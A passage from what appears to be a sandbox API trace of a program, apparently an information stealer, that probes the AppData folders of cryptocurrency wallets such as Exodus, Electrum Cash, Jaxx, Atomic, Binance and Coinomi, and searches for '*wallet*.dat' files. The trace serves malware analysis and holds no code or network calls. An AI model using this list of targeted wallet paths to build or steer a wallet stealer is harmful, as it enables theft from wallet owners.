lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0234.637] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0234.638] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\info.seco") returned 69 [0234.638] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\info.seco", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.638] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.638] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\ElectronCash\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\" [0234.638] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electroncash\\wallets")) returned 0 [0234.638] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\\\default_wallet") returned 74 [0234.638] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\\\default_wallet", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.639] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.639] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\MultiDoge\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\" [0234.639] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\multidoge")) returned 0 [0234.639] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\\\multidoge.wallet") returned 65 [0234.639] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\\\multidoge.wallet", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.639] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.640] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\jaxx\\Local Storage\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\" [0234.640] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jaxx\\local storage")) returned 0 [0234.640] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\\\file__0.localstorage") returned 78 [0234.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\\\file__0.localstorage", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.641] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.641] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0234.641] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0234.641] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\000003.log") returned 78 [0234.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\000003.log", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.641] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.642] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0234.642] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0234.642] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\CURRENT") returned 75 [0234.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\CURRENT", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.642] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.643] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0234.643] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0234.643] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOCK") returned 72 [0234.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOCK", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.643] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.644] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0234.644] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0234.644] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOG") returned 71 [0234.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOG", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.644] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.645] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0234.645] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0234.645] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\MANIFEST-000001") returned 83 [0234.645] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\MANIFEST-000001", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.645] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.645] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0234.645] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0234.646] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\0000*") returned 73 [0234.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\0000*", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.646] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.646] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Binance\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\" [0234.646] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\binance")) returned 0 [0234.646] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\\\app-store.json") returned 61 [0234.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\\\app-store.json", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.647] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.647] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Coinomi\\Coinomi\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" [0234.647] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets")) returned 0 [0234.647] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.wallet") returned 69 [0234.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.wallet", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.647] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1985a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.648] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Coinomi\\Coinomi\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" [0234.648] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets")) returned 0 [0234.648] wsprintfA (in: param_1=0x198480, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.config") returned 69 [0234.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.config", lpFindFileData=0x198338 | out: lpFindFileData=0x198338*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x198354, ftCreationTime.dwHighDateTime=0x75200115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198370, ftLastWriteTime.dwLowDateTime=0x1985a8, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19857c, nFileSizeLow=0x74acdc10, dwReserved0=0x198370, dwReserved1=0x1985a8, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0234.648] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1986cc | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.648] wsprintfA (in: param_1=0x1985ac, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*") returned 39 [0234.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*", lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2e36b86a, ftLastAccessTime.dwHighDateTime=0x1d82a29, ftLastWriteTime.dwLowDateTime=0x2e36b86a, ftLastWriteTime.dwHighDateTime=0x1d82a29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName=".", cAlternateFileName="")) returned 0x6e1a60 [0234.649] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.649] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2e36b86a, ftLastAccessTime.dwHighDateTime=0x1d82a29, ftLastWriteTime.dwLowDateTime=0x2e36b86a, ftLastWriteTime.dwHighDateTime=0x1d82a29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="..", cAlternateFileName="")) returned 1 [0234.649] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.649] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.649] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348c3ff0, ftCreationTime.dwHighDateTime=0x1d8273b, ftLastAccessTime.dwLowDateTime=0xac3c16c0, ftLastAccessTime.dwHighDateTime=0x1d8276c, ftLastWriteTime.dwLowDateTime=0xac3c16c0, ftLastWriteTime.dwHighDateTime=0x1d8276c, nFileSizeHigh=0x0, nFileSizeLow=0x17038, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="-MKAOQykfLiRmr dMoM.m4a", cAlternateFileName="-MKAOQ~1.M4A")) returned 1 [0234.649] StrCmpCA (pszStr1="-MKAOQykfLiRmr dMoM.m4a", pszStr2=".") returned -1 [0234.649] StrCmpCA (pszStr1="-MKAOQykfLiRmr dMoM.m4a", pszStr2="..") returned -1 [0234.649] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-MKAOQykfLiRmr dMoM.m4a") returned 61 [0234.649] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.649] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="-MKAOQykfLiRmr dMoM.m4a") returned 23 [0234.650] PathMatchSpecA (pszFile="-MKAOQykfLiRmr dMoM.m4a", pszSpec="*wallet*.dat") returned 0 [0234.650] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-MKAOQykfLiRmr dMoM.m4a\\*") returned 63 [0234.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-MKAOQykfLiRmr dMoM.m4a\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x348c3ff0, ftCreationTime.dwLowDateTime=0x1d8273b, ftCreationTime.dwHighDateTime=0xac3c16c0, ftLastAccessTime.dwLowDateTime=0x1d8276c, ftLastAccessTime.dwHighDateTime=0xac3c16c0, ftLastWriteTime.dwLowDateTime=0x1d8276c, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x17038, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x4d002d, cFileName="K", cAlternateFileName="")) returned 0xffffffff [0234.651] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca371c0, ftCreationTime.dwHighDateTime=0x1d81dfc, ftLastAccessTime.dwLowDateTime=0xe7f82020, ftLastAccessTime.dwHighDateTime=0x1d82837, ftLastWriteTime.dwLowDateTime=0xe7f82020, ftLastWriteTime.dwHighDateTime=0x1d82837, nFileSizeHigh=0x0, nFileSizeLow=0x12d95, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="1il1awgh8uIuPyVQnVl8.jpg", cAlternateFileName="1IL1AW~1.JPG")) returned 1 [0234.651] StrCmpCA (pszStr1="1il1awgh8uIuPyVQnVl8.jpg", pszStr2=".") returned 3 [0234.651] StrCmpCA (pszStr1="1il1awgh8uIuPyVQnVl8.jpg", pszStr2="..") returned 3 [0234.651] wsprintfA (in: param_1=0x198254, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\1il1awgh8uIuPyVQnVl8.jpg") returned 62 [0234.651] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0234.651] wsprintfA (in: param_1=0x19835c, param_2="%s" | out: param_1="1il1awgh8uIuPyVQnVl8.jpg") returned 24 [0234.651] PathMatchSpecA (pszFile="1il1awgh8uIuPyVQnVl8.jpg", pszSpec="*wallet*.dat") returned 0 [0234.651] wsprintfA (in: param_1=0x197f24, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\1il1awgh8uIuPyVQnVl8.jpg\\*") returned 64 [0234.651] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\1il1awgh8uIuPyVQnVl8.jpg\\*", lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x7ca371c0, ftCreationTime.dwLowDateTime=0x1d81dfc, ftCreationTime.dwHighDateTime=0xe7f82020, ftLastAccessTime.dwLowDateTime=0x1d82837, ftLastAccessTime.dwHighDateTime=0xe7f82020, ftLastWriteTime.dwLowDateTime=0x1d82837, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x12d95, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x690031, cFileName="l", cAlternateFileName="")) returned 0xffffffff [0234.651] FindNextFileA (in: hFindFile=0x6e1a60, lpFindFileData=0x198464 | out: lpFindFileData=0x198464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x578e64d0, ftCreationTime.dwHighDateTime=0x1d81cf3, ftLastAccessTime.dwLowDateTime=0xd04b92a0, ftLastAccessTime.dwHighDateTime=0x1d82327, ftLastWriteTime.dwLowDateTime=0xd04b92a0, ftLastWriteTime.dwHighDateTime=0x1d82327, nFileSizeHigh=0x0, nFileSizeLow=0x201b, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="7Di9dW_BhxfMaOBZAifk.flv", cAlternateFileName="7DI9DW~1.FLV")) returned 1 [0234.651] StrCmpCA 